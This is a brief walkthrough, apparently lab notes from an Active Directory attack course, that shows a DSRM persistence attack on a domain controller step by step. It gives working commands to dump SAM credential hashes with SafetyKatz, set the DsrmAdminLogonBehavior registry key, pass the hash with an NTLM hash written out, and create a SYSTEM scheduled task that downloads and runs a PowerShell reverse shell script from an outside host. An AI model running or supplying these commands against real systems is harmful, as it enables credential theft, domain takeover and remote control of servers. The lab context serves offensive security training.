DSRM attack give you the password of the local Administrator on the DC

First let’s dump the SAM file on the DC

.\\SafetyKatz.exe '"token::elevate"' '"lsadump::sam"' '"exit"'

Notice that we got the password Hash of the Local Administrator on the DC

To Login as this local Administrator on the DC using the DSRM we need to modify a registry key called DsrmAdminLogonBehavior

New-ItemProperty "HKLM:\\System\\CurrentControlSet\\Control\\Lsa" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD

Now we have to Pass-The-Hash to login as this Local Administrator user

.\\Safteykatz.exe '"sekurlsa::pth /user:Administrator /domain:dcorp-dc /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:powershell.exe"'

Now we have new PowerShell opned

As Observed We Can no list the content of the C$ in the DC

Let me create a Schedule Task on the DC to give us Reverse Shell

schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'IEX(New-Object System.Net.WebClient).DownloadString(''<http://172.16.100.22/Invoke-PowerShellTcp.ps1>''')'"

Now let’s start the Schedule Task